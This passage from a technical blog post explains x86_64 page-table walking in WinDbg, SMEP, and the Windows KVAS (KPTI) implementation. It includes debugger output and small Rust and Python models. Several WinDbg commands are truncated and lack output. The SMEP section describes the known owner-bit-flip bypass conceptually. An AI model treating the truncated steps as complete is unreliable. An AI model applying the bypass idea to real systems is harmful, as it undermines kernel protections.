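    let any = |n: u32| entries.iter().any(|&e| (e >> n) & 1 == 1);
    Access {
        present: all(0),
        // User and write access must be granted at every level.
        user: all(2),
        writable: all(1),
        // A single execute-disable bit anywhere removes execute access.
        executable: !any(63),
    }
}
```

Feeding it the four values from the !pte output above (PXE, PPE, PDE, PTE) gives a present, user mode, read only, non-executable page, which matches what !pte prints for the PTE.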

Manually Walking the Page Tables

To appreciate tools like !pte let's look at an example of manually walking the page tables to resolve the physical address of data from its virtual address. I'm going to be walking the page tables on a system that has KVAS disabled, to reduce complexity, but note there will be a slight twist in this example.
Let's look for nt!NtCreateFile. First, we can use the .formats command to get the binary representation of the address of nt!NtCreateFile. The CR3 register is also required here, since it holds the hardware address of the base of the page tables.

0: kd> .formats nt!NtCreateFile
Evaluate expression:
  Hex:     fffff805`2e3ff090
  Decimal: -8773842243440
  Octal:   1777777600245617770220
  Binary:  11111111 11111111 11111000 00000101 00101110 00111111 11110000 10010000
  Chars:   .....?..
  Time:    ***** Invalid FILETIME
  Float:   low 4.3642e-011 high -1.#QNAN
  Double:  -1.#QNAN
0: kd> r cr3
cr3=00000000001ad000

Since addresses must be canonical, bits 63-48 are all copies of bit 47. Then we have bits representing the index into each level of the page tables (9 bits at a time until the page offset):

  • Bits 47-39 = Page-Map Level 4 (PML4) entry (sometimes PXE)
  • Bits 38-30 = Page Directory Pointer Table (PDPT) entry (sometimes PPE)
  • Bits 29-21 = Page Directory Entry (PDE)
  • Bits 20-12 = Page Table Entry (PTE)
  • Bits 11-0 = Offset into physical page where the start of the data resides

Let's break down the .formats output into each index:

                            PML4 idx.   PDPT idx.   PDT idx.    PTE idx.     page idx.
Binary:  11111111 11111111 [11111000 0][0000101 00][101110 001][11111 11110][000 10010000]
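The same split can be done with shifts and masks. This is a minimal sketch; VaIndices, split_va, and is_canonical are names made up for the example.

```rust
/// Table indices and page offset of a 4-level x86_64 virtual address.
#[derive(Debug, PartialEq)]
struct VaIndices {
    pml4: usize,
    pdpt: usize,
    pd: usize,
    pt: usize,
    offset: usize,
}

fn split_va(va: u64) -> VaIndices {
    // Each index is 9 bits wide, so mask with 0x1ff after shifting.
    let idx = |shift: u32| ((va >> shift) & 0x1ff) as usize;
    VaIndices {
        pml4: idx(39),
        pdpt: idx(30),
        pd: idx(21),
        pt: idx(12),
        offset: (va & 0xfff) as usize,
    }
}

/// True when bits 63-48 are copies of bit 47.
fn is_canonical(va: u64) -> bool {
    // Sign-extend from bit 47 and compare with the original value.
    ((((va << 16) as i64) >> 16) as u64) == va
}
```

For fffff805`2e3ff090 this gives indices 0x1f0, 0x14, 0x171, and 0x1ff with a page offset of 0x090, the same groups as in the binary breakdown above.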

Each level of the page hierarchy is just an array of 512 (0x200) _MMPTE_HARDWARE structures. To get the PML4 entry, index into the array starting at CR3 by the PML4 index found from the .formats command above. Remember the -p flag to dt or this will fail. Also, instead of prefixing binary with 0b, which would make too much sense, WinDbg prefixes binary with 0y.

0: kd> dt -p _MMPTE_HARDWARE @@C++(@cr3+@@(0y111110000)*sizeof(_MMPTE_HARDWARE))
nt!_MMPTE_HARDWARE
   +0x000 Valid            : 0y1
   +0x000 Dirty1           : 0y1
   +0x000 Owner            : 0y0
   +0x000 WriteThrough     : 0y0
   +0x000 CacheDisable     : 0y0
   +0x000 Accessed         : 0y1
   +0x000 Dirty            : 0y1
   +0x000 LargePage        : 0y0
   +0x000 Global           : 0y0
   +0x000 CopyOnWrite      : 0y0
   +0x000 Unused           : 0y0
   +0x000 Write            : 0y0
   +0x000 PageFrameNumber  : 0y000000000000000000000100101100001001 (0x4b09)
   +0x000 ReservedForHardware : 0y0000
   +0x000 ReservedForSoftware : 0y0000
   +0x000 WsleAge          : 0y0000
   +0x000 WsleProtection   : 0y000
   +0x000 NoExecute        : 0y0

Let's also look at the entry with !dq:

0: kd> !dq @@C++(@cr3+@@(0y111110000)*sizeof(_MMPTE_HARDWARE)) L1
#  1adf80 00000000`04b09063

To get to the Page Directory Pointer Table (PDPT) entry from here we need to take the PageFrameNumber, shift it back into its original position in _MMPTE_HARDWARE via a shift left by 12 (0xc) bits and then take the PDPT index. You can also just mask the QWORD that represents the entry (ex. 0x0000000004b09063 & 0xfffffffff000).
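The arithmetic for that step is small enough to sketch directly. The function names are hypothetical; the mask is the one from the paragraph above, and 8 is sizeof(_MMPTE_HARDWARE).

```rust
/// sizeof(_MMPTE_HARDWARE)
const ENTRY_SIZE: u64 = 8;

/// Physical base of the table an entry points to: mask off everything
/// except the PageFrameNumber bits, which leaves PFN << 12.
fn table_base(entry: u64) -> u64 {
    entry & 0x0000_ffff_ffff_f000
}

/// Physical address of entry number `index` in the table at `base`.
fn entry_address(base: u64, index: u64) -> u64 {
    base + index * ENTRY_SIZE
}
```

With CR3 = 0x1ad000 and PML4 index 0x1f0, entry_address gives 0x1adf80, the address !dq printed. Masking 0x04b09063 gives 0x4b09000, the same as 0x4b09 shifted left by 12, and adding PDPT index 0x14 times 8 gives 0x4b090a0 as the PDPT entry address.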

0: kd> dt -p _MMPTE_HARDWARE @@C++((0x4b09

Now for the PDE and PTE levels, which are calculated the same way, each using the PFN from the previous level's entry.

0: kd> dt -p _MMPTE_HARDWARE @@C++((0x4b0a
0: kd> dt -p _MMPTE_HARDWARE @@C++((0x2c00

What happened here? The PTE does not seem valid. Pay close attention to the flags in the PDE.

   +0x000 LargePage        : 0y1

This means that the page is part of a large page and the attributes from the PDE apply to every page that it would represent. Large pages on x86_64 stand in for a whole page table worth of pages: 512 entries of 0x1000 bytes each, which works out to 2MB (0x200000 bytes) per large page:

0: kd> ? 0n512 * 0x1000
0: kd> ? 0n2 * 0n1024 * 0n1024

Both expressions evaluate to 0x200000. There are also huge pages that work the same way, except at the PDPT level instead, where each one covers 512 * 512 * 0x1000 bytes, or 1GB.

To resolve the starting physical address in this situation, you just need to use the remaining bits (20-0) as an offset into the large page PFN. The diagram above (from the .formats command) becomes the following:

                            PML4 idx.   PDPT idx.   PDT idx.    page idx.
Binary:  11111111 11111111 [11111000 0][0000101 00][101110 001][11111 11110000 10010000]

Now we just need to do the math:

0: kd> ? (0x2c00<<c)+0y111111111000010010000
Evaluate expression: 48230544 = 00000000`02dff090

Validate by dumping out what is at the virtual address for nt!NtCreateFile and what is at the physical address we calculated above:

0: kd> !dq (0x2c00<<c)+0y111111111000010010000
# 2dff090 33000000`88ec8148 44c77824`448948c0
# 2dff0a0 44890000`00207024 89602444`89486824
# 2dff0b0 00e02484`8b582444 8b485024`44890000
# 2dff0c0 89480000`00d82484 00d02484`8b482444
# 2dff0d0 848b4024`44890000 24448900`0000c824
# 2dff0e0 000000c0`24848b38 b824848b`30244489
# 2dff0f0 48282444`89000000 48000000`b024848b
# 2dff100 000017e8`20244489 00000088`c4814800
0: kd> dq nt!NtCreateFile
fffff805`2e3ff090  33000000`88ec8148 44c77824`448948c0
fffff805`2e3ff0a0  44890000`00207024 89602444`89486824
fffff805`2e3ff0b0  00e02484`8b582444 8b485024`44890000
fffff805`2e3ff0c0  89480000`00d82484 00d02484`8b482444
fffff805`2e3ff0d0  848b4024`44890000 24448900`0000c824
fffff805`2e3ff0e0  000000c0`24848b38 b824848b`30244489
fffff805`2e3ff0f0  48282444`89000000 48000000`b024848b
fffff805`2e3ff100  000017e8`20244489 00000088`c4814800

There you have it, validation that the process we followed was correct. If the PDE had not been a large page, then the PTE would have been valid and bits 11-0 would have been an offset into the page identified by the PTE's PFN.
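The manual walk above can be condensed into a short sketch. This is a simplified model rather than how WinDbg or the CPU implements it: PHYS is a hypothetical stand-in for physical memory, filled only with the three entries seen in this example, and translate is an illustrative name.

```python
ENTRY_SIZE = 8
PFN_MASK = 0x0000FFFFFFFFF000
VALID = 1 << 0
LARGE_PAGE = 1 << 7

# Hypothetical stand-in for physical memory: entry address -> 64-bit entry.
# The values are the ones shown for nt!NtCreateFile in this example.
PHYS = {
    0x001ADF80: 0x0000000004B09063,  # PML4 entry
    0x04B090A0: 0x0000000004B0A063,  # PDPT entry
    0x04B0AB88: 0x0A00000002C001A1,  # PDE with LargePage = 1
}

def translate(cr3: int, va: int, read_entry=PHYS.__getitem__) -> int:
    """Walk PML4 -> PDPT -> PD -> PT, stopping early at large/huge pages."""
    table = cr3 & PFN_MASK
    for shift in (39, 30, 21, 12):   # bit position of each level's index
        entry = read_entry(table + ((va >> shift) & 0x1FF) * ENTRY_SIZE)
        if not entry & VALID:
            raise LookupError(f"entry for index at bit {shift} is not valid")
        base = entry & PFN_MASK
        # Bit 7 only means "large page" at the PDPT and PD levels.
        if shift == 12 or (shift in (30, 21) and entry & LARGE_PAGE):
            offset_mask = (1 << shift) - 1
            return (base & ~offset_mask) + (va & offset_mask)
        table = base
    raise AssertionError("unreachable")

print(hex(translate(0x1AD000, 0xFFFFF8052E3FF090)))  # 0x2dff090
```

Because the PDE has LargePage set, the loop returns at the third level and never reads the (invalid) PTE.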

WinDbg Commands

Of course it is very annoying to do that whole process manually, so WinDbg provides two ways to accomplish what we just looked at. The !pte command will take what is in CR3 and walk the page tables with the virtual address you give it. To match up with the same example as above:

0: kd> !pte nt!NtCreateFile
                                           VA fffff8052e3ff090
PXE at FFFFE5F2F97CBF80    PPE at FFFFE5F2F97F00A0    PDE at FFFFE5F2FE014B88    PTE at FFFFE5FC02971FF8
contains 0000000004B09063  contains 0000000004B0A063  contains 0A00000002C001A1  contains 0000000000000000
pfn 4b09      ---DA--KWEV  pfn 4b0a      ---DA--KWEV  pfn 2c00      -GL-A--KREV  LARGE PAGE pfn 2dff 

This shows the virtual addresses of each level in the hierarchy as well as a breakdown of what each _MMPTE_HARDWARE structure contains. There is also the !vtop command, which will let you specify what page table base (hardware address) to use as the base of the page tables (PML4). This will become useful to us in investigating KVAS, because we want to be able to look at each page table without having to change CR3. Again mirroring the example above to show what data it provides:

0: kd> r cr3
cr3=00000000001ad000
0: kd> ? nt!NtCreateFile
Evaluate expression: -8773842243440 = fffff805`2e3ff090
0: kd> !vtop 1ad000 fffff8052e3ff090
Amd64VtoP: Virt fffff8052e3ff090, pagedir 00000000001ad000
Amd64VtoP: PML4E 00000000001adf80
Amd64VtoP: PDPE 0000000004b090a0
Amd64VtoP: PDE 0000000004b0ab88
Amd64VtoP: Large page mapped phys 0000000002dff090
Virtual address fffff8052e3ff090 translates to physical address 2dff090.

You can examine the addresses via dump commands prefixed with ! (ex. !dq, !dd, !dc) and by using dump type (dt) with the -p flag for physical addresses.

Note that !vtop doesn't play as nice with symbols or WinDbg numbers, so make sure things are in the right format before passing them in. For example, the following commands are invalid to !vtop:

0: kd> !vtop 1ad000 nt!NtCreateFile
Amd64VtoP: Virt 0000000000000000, pagedir 00000000001ad000
Amd64VtoP: PML4E 00000000001ad000
Amd64VtoP: PDPE 0000000100ee1000
Amd64VtoP: zero PDPE
Virtual address 0 translation fails, error 0xD0000147.
0: kd> !vtop @cr3 fffff8052e3ff090
usage: vtop PFNOfPDE VA
0: kd> !vtop 1ad000 fffff805`2e3ff090
Amd64VtoP: Virt 00000000fffff805, pagedir 00000000001ad000
Amd64VtoP: PML4E 00000000001ad000
Amd64VtoP: PDPE 0000000100ee1018
Amd64VtoP: zero PDPE
Virtual address fffff805 translation fails, error 0xD0000147.
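If you are scripting around the debugger, a small helper can put both arguments into the plain hex form that !vtop accepts. This is just a sketch with made-up function names; it does not talk to WinDbg, and symbols or registers still need to be resolved to numbers first (for example with the ? command).

```python
def normalize_hex(text: str) -> str:
    """Drop the WinDbg backtick separator, any 0x prefix, and leading zeros."""
    return format(int(text.replace("`", ""), 16), "x")

def vtop_command(page_table_base: str, virtual_address: str) -> str:
    """Build a !vtop command line from two hex strings copied out of WinDbg."""
    return f"!vtop {normalize_hex(page_table_base)} {normalize_hex(virtual_address)}"

print(vtop_command("00000000001ad000", "fffff805`2e3ff090"))
# !vtop 1ad000 fffff8052e3ff090
```

Passing something like nt!NtCreateFile or @cr3 raises ValueError here, which is a louder failure than the silent mistranslation shown above.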

We will be using these commands to walk the page tables for the rest of the post, but it is good to know how to manually walk them.

SMEP

SMEP stands for Supervisor Mode Execution Prevention (or sometimes Protection). The idea here is that code in lower privileged memory pages should never be trusted (i.e. executed) by a higher privileged mode. For standard SMEP this means executable pages allocated in user mode should not be executed while in kernel mode. It is enforced by the CPU itself and requires explicit support. Intel processors started rolling out support for this feature around 2012 (Ivy Bridge) and AMD processors around 2014 (Family 17h, Family 15h model >60h). SMEP is enabled on a supported processor when bit 20 of the CR4 register is set. This is consistent between AMD and Intel processors.

Do you remember the owner bit (U/K) from the _MMPTE_HARDWARE structure? This is the bit that says whether a page belongs to user mode or kernel mode and is how SMEP is enforced. When in kernel mode (supervisor mode), if the owner bit is 1, then the page is owned by user mode and code should not be executed inside of it. This raises the question: well, what if we can flip that bit? Can we execute those pages? The answer was yes, absolutely, until KVAS was introduced. My favorite presentation on this topic is from EKOParty 2015 by Enrique Nissim and Nicolas Economou called Windows SMEP Bypass U=S. We will examine why KVAS mitigates this attack soon.
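The check can be modeled in a few lines. This is a simplified sketch of the rule rather than anything the CPU or kernel exposes: the function names are made up, the CR4 value is hypothetical, and the entries are the ones !pte reports for ntdll!NtCreateFile on the KVAS disabled system later in this post. It assumes a translation counts as user-owned only when the owner bit is 1 at every level of the walk.

```python
CR4_SMEP = 1 << 20   # CR4 bit 20 enables SMEP
PTE_OWNER = 1 << 2   # _MMPTE_HARDWARE.Owner (U/K): 1 = user, 0 = kernel

def is_user_page(entries) -> bool:
    """User-owned only if every level of the walk has Owner = 1."""
    return all(entry & PTE_OWNER for entry in entries)

def smep_blocks_fetch(cr4: int, entries, kernel_mode: bool) -> bool:
    """True if SMEP would fault an instruction fetch through these entries."""
    return bool(cr4 & CR4_SMEP) and kernel_mode and is_user_page(entries)

# PXE, PPE, PDE, PTE for ntdll!NtCreateFile (KVAS disabled system)
ntdll_walk = [0x0A000000BC048867, 0x0A0000000604E867,
              0x0A00000005350867, 0x010000006A1EC025]
cr4 = CR4_SMEP  # hypothetical CR4 value with only the SMEP bit set

print(smep_blocks_fetch(cr4, ntdll_walk, kernel_mode=True))   # True

# Clearing the owner bit in the final entry is the "flip that bit" idea.
flipped = ntdll_walk[:-1] + [ntdll_walk[-1] & ~PTE_OWNER]
print(smep_blocks_fetch(cr4, flipped, kernel_mode=True))      # False
```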

Another technology that implements the same sort of trust boundary that SMEP enforces is called Mode-Based Execution Control (MBEC, or just MBE Control), which is enforced between a hypervisor and its guest(s). I'm not going to deep dive into that here, but just know that the high level concept of SMEP applies where the supervisor (hypervisor) does not trust the less privileged pages in user mode (guest) and thus will not execute in them from supervisor mode. Another interesting note about hypervisors: it's also possible to implement software SMEP via Extended Page Table (EPT) permissions. Here's a post from 2014 detailing how this might be done.

There is also Supervisor Mode Access Prevention (SMAP), which is a newer control that prevents accesses to user mode while in kernel mode, unless certain conditions are met. It can be turned on via bit 21 of CR4 on supported processors. This is not entirely relevant to this post, so I'll skip the details on this one for now as well.

KVAS Implementation in Brief

To avoid information disclosure from a successful exploit of the Meltdown vulnerability, separate page tables are kept for user mode and kernel mode for each process. The general term for this technology is Kernel Page Table Isolation (KPTI). Kernel Virtual Address Shadow (KVAS) is the Windows specific implementation of KPTI. The user mode version of the page tables does not even contain the mappings for (almost all) kernel addresses, while the kernel mode version contains mappings for both user and kernel address spaces. Some pages exist in both sets, like KUSER_SHARED_DATA and the system call handler, which actually replaces CR3 on entry and exit into/from the handler, as well as other kernel entry/exit points. We will be looking specifically at the system call handler for this example.

Check out the Microsoft blog post describing the implementation. Fortinet also has a great post on the internals of how KVAS is initialized in the kernel.

Your first thought with this implementation may be: "that sounds very memory expensive!". The overhead of having two sets of paging structures (which occupy some memory) per process is definitely nonzero. However, one optimization that exists relies on the fact that Microsoft does not consider the boundary between an administrator account and the kernel to be a security boundary. Processes that execute in an elevated context do not use KVAS at all! From Microsoft:

Because these applications are fully trusted by the operating system, and already have (or could obtain) the capability to load drivers that could naturally access kernel memory, KVA shadowing is not required for fully-privileged applications.

This includes applications that are run by users in the BUILTIN\Administrators group and "processes that execute as a fully-elevated administrator account". Remember: this is an information disclosure concern, so if that information can already be accessed, disclosing it is not a concern. Low privileged users should not be able to leak kernel memory, so this mitigation will be in full effect for those users.


To begin to understand the implementation of KVAS in the Windows kernel, we can look at important fields in the nt!_KPRCB and nt!_KPROCESS structures:

0: kd> dt _KPROCESS DirectoryTableBase UserDirectoryTableBase AddressPolicy
ntdll!_KPROCESS
   +0x028 DirectoryTableBase     : Uint8B
   +0x388 UserDirectoryTableBase : Uint8B
   +0x390 AddressPolicy          : UChar
0: kd> dt nt!_KPRCB KernelDirectoryTableBase RspBaseShadow UserRspShadow ShadowFlags
   +0x8e80 KernelDirectoryTableBase : Uint8B
   +0x8e88 RspBaseShadow            : Uint8B
   +0x8e90 UserRspShadow            : Uint8B
   +0x8e98 ShadowFlags              : Uint4B

Before KVAS, _KPROCESS.DirectoryTableBase held the base of the page tables for a particular process. Remember, on a system without KVAS or in a process where KVAS is disabled, the user and kernel page tables are not separated, so _KPROCESS.DirectoryTableBase is moved into CR3 on process context switch. When KVAS is enabled, _KPROCESS.DirectoryTableBase holds the complete (user and kernel) page table base. The value of _KPROCESS.DirectoryTableBase is moved into _KPRCB.KernelDirectoryTableBase when a process context switch occurs. The user-only page table base is held in _KPROCESS.UserDirectoryTableBase. The _KPROCESS.AddressPolicy field tells the kernel if a process participates in KVAS. If _KPROCESS.AddressPolicy is 1, then KVAS is disabled for the process; if it is 0, then KVAS is enabled. _KPRCB.ShadowFlags holds flags that tell the kernel if KVAS is enabled for the process (according to _KPROCESS.AddressPolicy) and which page table is active. On entry points to the kernel, the value from _KPRCB.KernelDirectoryTableBase is loaded into CR3. On exit from the kernel _KPROCESS.UserDirectoryTableBase is moved into CR3. _KPRCB.RspBaseShadow and _KPRCB.UserRspShadow hold the stack pointer for each mode and are loaded into RSP at entry/exit from the kernel, respectively.

In a KVAS participating process, the hardware address in CR3 has some flags in the bottom bits: bit 0 is set for a user mode page table and bit 1 is set for a kernel mode page table. This can be seen by examining _KPROCESS.DirectoryTableBase and _KPROCESS.UserDirectoryTableBase for a KVAS participating process (explorer.exe):

0: kd> !process 0 0 explorer.exe
PROCESS ffffb68d61dd9080
    SessionId: 1  Cid: 1098    Peb: 00fa4000  ParentCid: 1078
    DirBase: bd6de002  ObjectTable: ffffde87c9020e00  HandleCount: 2120.
    Image: explorer.exe

0: kd> .process /i /p ffffb68d61dd9080
0: kd> dt _KPROCESS @$proc DirectoryTableBase UserDirectoryTableBase
ntdll!_KPROCESS
   +0x028 DirectoryTableBase     : 0xbd6de002
   +0x388 UserDirectoryTableBase : 0xbd6dd001

To use the !vtop command with these values, just mask off the bottom bits.
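A minimal sketch of that masking, assuming the bit meanings described above (bit 0 for a user mode page table, bit 1 for a kernel mode page table). The function name and the "unflagged" label are made up for illustration.

```python
USER_TABLE = 1 << 0      # bit 0: user mode page table
KERNEL_TABLE = 1 << 1    # bit 1: kernel mode page table
BASE_MASK = 0x0000FFFFFFFFF000

def describe_dirbase(value: int) -> tuple:
    """Split a DirectoryTableBase value into (physical base, table kind)."""
    kind = {USER_TABLE: "user", KERNEL_TABLE: "kernel"}.get(value & 0b11, "unflagged")
    return value & BASE_MASK, kind

for raw in (0xBD6DE002, 0xBD6DD001):
    base, kind = describe_dirbase(raw)
    print(f"{raw:#x} -> !vtop base {base:x} ({kind} page table)")
```

For the explorer.exe values above this gives bd6de000 for the kernel table and bd6dd000 for the user table.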


The system call handler is different on systems with KVAS enabled. The address of the system call handler is stored in Model Specific Register (MSR) 0xC0000082 (LSTAR) on x86_64 systems. On an x86_64 machine with KVAS explicitly disabled, the system call handler is KiSystemCall64 as shown below:

0: kd> db nt!KiKvaShadow L1
fffff805`2ec01840  00                                               .
0: kd> rdmsr c0000082
msr[c0000082] = fffff805`2e2066c0
0: kd> ln fffff805`2e2066c0
Browse module
Set bu breakpoint

(fffff805`2e2066c0)   nt!KiSystemCall64   |  (fffff805`2e206900)   nt!KiSystemServiceUser

At the top of the system call handler you can see that RSP is moved into _KPCR.UserRsp and _KPRCB.RspBase is moved into RSP. _KPCR.UserRsp is then pushed onto the kernel stack for recovery later (at the end of the system call handler).

KiSystemCall64
The system call handler when KVAS is disabled for the system

Next, let's look at the system call handler that is used when KVAS is enabled on the system:

0: kd> db nt!KiKvaShadow L1
fffff804`75001840  01                                               .
0: kd> rdmsr c0000082
msr[c0000082] = fffff804`74c13180
0: kd> ln fffff804`74c13180
Browse module
Set bu breakpoint

(fffff804`74c13180)   nt!KiSystemCall64Shadow   |  (fffff804`74c14060)   nt!_guard_retpoline_icall_handler

KiSystemCall64Shadow is used. The beginning of this function is similar to KiSystemCall64, with a few extra steps. It backs up RSP to _KPRCB.UserRspShadow, swaps _KPRCB.KernelDirectoryTableBase into CR3 if the second bit of _KPRCB.ShadowFlags is set, and restores the kernel stack pointer to RSP from _KPRCB.RspBaseShadow, before pushing _KPRCB.UserRspShadow to the stack (as opposed to _KPCR.UserRsp). See the disassembly below:

KiSystemCall64Shadow
The system call handler when KVAS is enabled for the system

At the end of KiSystemCall64Shadow there is a jump to KiSystemServiceUser which is partway through KiSystemCall64.

KiSystemCall64Shadow_end
The end of the Shadow syscall handler jumps to the label KiSystemServiceUser, which is in the middle of KiSystemCall64

At the end of KiSystemCall64 there is a test to see if KiKvaShadow is 1 (KVAS enabled). If it is, a jump to KiKernelSysretExit is made.

KiSystemCall64_return
The end of KiSystemCall64 calls KiKernelSysretExit if KVAS is enabled

KiKernelSysretExit checks the 2nd bit of _KPRCB.ShadowFlags to see if KVAS is enforced for the process (0 = enforced, 1 = not enforced). If it is enforced, then _KPROCESS.UserDirectoryTableBase is loaded into CR3. If the low bit of _KPROCESS.UserDirectoryTableBase is set and the low bit of _KPRCB.ShadowFlags is set, then the low bit of _KPRCB.ShadowFlags is unset, indicating that the user page table is now in use.

KiKernelSysretExit
KiKernelSysretExit checks if CR3 needs to be updated or not on exit from the kernel
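Here is a rough model of that exit logic, written in Python purely for illustration. It is a reading of the description above and not decompiled code: Cpu and sysret_exit are made-up names, and treating the low bit of ShadowFlags as "kernel page table currently active" is an assumption. The input values are the cmd.exe ones from the privileged process experiment later in this post.

```python
from dataclasses import dataclass

SHADOW_KERNEL_TABLE_ACTIVE = 1 << 0  # low bit (assumed meaning: kernel table in CR3)
SHADOW_NOT_ENFORCED = 1 << 1         # 2nd bit: KVAS not enforced for this process

@dataclass
class Cpu:
    cr3: int
    shadow_flags: int

def sysret_exit(cpu: Cpu, user_directory_table_base: int) -> Cpu:
    """Model of the CR3 handling on the way back to user mode."""
    if cpu.shadow_flags & SHADOW_NOT_ENFORCED:
        return cpu                        # not enforced: CR3 is left alone
    cpu.cr3 = user_directory_table_base   # switch to the user-only page table
    if user_directory_table_base & 1 and cpu.shadow_flags & SHADOW_KERNEL_TABLE_ACTIVE:
        cpu.shadow_flags &= ~SHADOW_KERNEL_TABLE_ACTIVE
    return cpu

print(sysret_exit(Cpu(cr3=0x0785A002, shadow_flags=1), 0xBB659001))  # non-elevated
print(sysret_exit(Cpu(cr3=0x8B073002, shadow_flags=2), 0x1))         # elevated
```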

KiKernelSysretExit is called in a few different places. Unsurprisingly, these places are exit-points from the kernel.

KiKernelSysretExit_xref
KiKernelSysretExit is called in a few kernel exitpoint functions

Next, let's look at cross references of KiKvaShadow just to get an idea of what functions are affected by KVAS.

KiKvaShadow_xref
The shadow flag is checked in many places

There are quite a few functions where this flag is checked. Investigating interesting functions is an exercise left up to the reader.


Now that we have seen a few places where the kernel switches up CR3, let's look at thread context switching to see how it is handled. Thread context switching is performed by the nt!KiSwapContext function, which saves the context and then calls nt!SwapContext:

KiSwapContext
KiSwapContext is a small function that calls SwapContext

The RCX and RDX registers hold the destination and source _KTHREAD structures, respectively. These values are moved into RSI and RDI in preparation for a call to nt!SwapContext. An overview of SwapContext can be seen below:

SwapContext_overview
SwapContext is a fairly large function

In SwapContext, RDI is a pointer to the thread being switched out and RSI is a pointer to the thread being switched in. Among other things and especially important to us, SwapContext is responsible for switching in the correct page table to CR3, checking the destination process's address policy, and setting up _KPRCB.ShadowFlags as well as _KPRCB.KernelDirectoryTableBase. If the destination process is the same as the source process, this entire sequence is unnecessary and is skipped. If they are different, then they may have different address policies.

The destination process (RSI.ApcState.Process) is loaded into R14 and then, if KVAS is enabled on the system, the 2nd bit of _KPROCESS.DirectoryTableBase is checked to see if it is a kernel page table. If it is a kernel page table, the high bit of the page table address will be set and the low bit of _KPRCB.ShadowFlags will be set. The (potentially) modified kernel page table address is then moved into _KPRCB.KernelDirectoryTableBase, the page table's high bit is unset, the 2nd bit of _KPRCB.ShadowFlags is masked off (unset), and _KPROCESS.AddressPolicy is checked. If the address policy is 1 (KVAS not enforced), then _KPRCB.ShadowFlags is xor-ed with 3 (0b11) to set the 2nd bit and unset the first, resulting in a _KPRCB.ShadowFlags value of 2.

Then, the page table address is put into CR3. Interrupts are disabled (cli) and then re-enabled (sti) around the switch to prevent the system from interrupting it. If running under Hyper-V, then instead of accessing CR3 directly, a hypercall will be made to switch address spaces.

SwapContext_AddressPolicy
The correct ShadowFlags are set based on a number of checks, then CR3 is updated with the new page table base
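The bit twiddling described for SwapContext is easier to follow when written out. The sketch below only models the prose on a KVAS enabled system; it is not a decompilation, and swap_context_paging is a made-up name. The inputs are the cmd.exe values from the privileged process experiment later in this post, and the incoming ShadowFlags value of 0 is an assumption.

```python
HIGH_BIT = 1 << 63

def swap_context_paging(directory_table_base: int, address_policy: int,
                        shadow_flags: int = 0):
    """Return (cr3, KernelDirectoryTableBase, ShadowFlags) for the new process."""
    table = directory_table_base
    if table & 0b10:              # 2nd bit set: this is a kernel page table
        table |= HIGH_BIT         # set the high bit of the page table address
        shadow_flags |= 0b01      # set the low bit of ShadowFlags
    kernel_dtb = table            # saved to _KPRCB.KernelDirectoryTableBase
    table &= ~HIGH_BIT            # high bit is unset again
    shadow_flags &= ~0b10         # 2nd bit of ShadowFlags is masked off
    if address_policy == 1:       # KVAS not enforced for this process
        shadow_flags ^= 0b11      # sets the 2nd bit, unsets the 1st
    return table, kernel_dtb, shadow_flags

for name, dtb, policy in (("non-elevated", 0x0785A002, 0), ("elevated", 0x8B073002, 1)):
    cr3, kdtb, flags = swap_context_paging(dtb, policy)
    print(f"{name}: cr3={cr3:#x} KernelDirectoryTableBase={kdtb:#x} ShadowFlags={flags}")
```

With these inputs the model ends up with ShadowFlags of 1 for the non-elevated process and 2 for the elevated one.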

A few blocks down, the thread's initial stack (_KTHREAD.InitialStack) is saved in _KPRCB.RspBase and either _KPCR.TssBase->Rsp0 or _KPRCB.RspBaseShadow; the latter is used on a KVAS enabled system.

SwapContext_tss_or_RspBaseShadow
The current thread's kernel stack base is kept in different places for KVAS and non-KVAS processes

On examination of these fields, we can see that on a KVAS enabled system _KPRCB.RspBase, _KPRCB.RspBaseShadow, and _KTHREAD.InitialStack are all the same value.

0: kd> dt _KPCR @$pcr Prcb.UserRspShadow Prcb.RspBase Prcb.RspBaseShadow TssBase->Rsp0
ntdll!_KPCR
   +0x008 TssBase            : 
      +0x004 Rsp0               : 0xfffff804`78c64200
   +0x180 Prcb               : 
      +0x028 RspBase            : 0xffff828b`d7d02c90
      +0x8e88 RspBaseShadow      : 0xffff828b`d7d02c90
      +0x8e90 UserRspShadow      : 0x555ee68
0: kd> dt _KTHREAD @$thread InitialStack
ntdll!_KTHREAD
   +0x028 InitialStack : 0xffff828b`d7d02c90 Void

On a KVAS disabled system, _KPCR.TssBase->Rsp0, _KPRCB.RspBase, and _KTHREAD.InitialStack are all the same value.

0: kd> dt _KPCR @$pcr Prcb.UserRspShadow Prcb.RspBase Prcb.RspBaseShadow TssBase->Rsp0
nt!_KPCR
   +0x008 TssBase            : 
      +0x004 Rsp0               : 0xfffff805`31d3cc90
   +0x180 Prcb               : 
      +0x028 RspBase            : 0xfffff805`31d3cc90
      +0x8e88 RspBaseShadow      : 0
      +0x8e90 UserRspShadow      : 0
0: kd> dt _KTHREAD @$thread InitialStack
nt!_KTHREAD
   +0x028 InitialStack : 0xfffff805`31d3cc90 Void

A final question: What do all of these functions have in common?
They are all in the KVASCODE section of the kernel binary.

KVASCODE
The KVASCODE section is mapped for both sets of page tables

This section of the kernel binary is mapped in both sets of page tables! To validate this claim, let's use !vtop to resolve nt!KiSystemCall64Shadow (0xfffff80474c13180) in both sets of page tables.

0: kd> dt _KPROCESS @$proc DirectoryTableBase UserDirectoryTableBase
ntdll!_KPROCESS
   +0x028 DirectoryTableBase     : 0xbd6de002
   +0x388 UserDirectoryTableBase : 0xbd6dd001
0: kd> !vtop 0xbd6de000 0xfffff80474c13180
Amd64VtoP: Virt fffff80474c13180, pagedir 00000000bd6de000
Amd64VtoP: PML4E 00000000bd6def80
Amd64VtoP: PDPE 0000000004809088
Amd64VtoP: PDE 000000000480ad30
Amd64VtoP: Large page mapped phys 0000000003213180
Virtual address fffff80474c13180 translates to physical address 3213180.
0: kd> !vtop 0xbd6dd000 0xfffff80474c13180
Amd64VtoP: Virt fffff80474c13180, pagedir 00000000bd6dd000
Amd64VtoP: PML4E 00000000bd6ddf80
Amd64VtoP: PDPE 000000013cd21088
Amd64VtoP: PDE 000000013cd20d30
Amd64VtoP: PTE 000000013cd27098
Amd64VtoP: Mapped phys 0000000003213180
Virtual address fffff80474c13180 translates to physical address 3213180.

The address maps successfully to physical address 3213180 in both sets of page tables for this particular process. This makes sense because if these functions didn't exist in both sets of page tables then the implementation would not be able to do the switch properly. The backing memory would not exist according to the page table at some point during the function (either before or after the CR3 switch).

Experiments

Now onto my experiments. For each experiment I will run the same commands on a system with KVAS enabled and also on a system with KVAS disabled and note the differences. Hopefully this will help you understand the implementation a bit better! I know it has helped me.

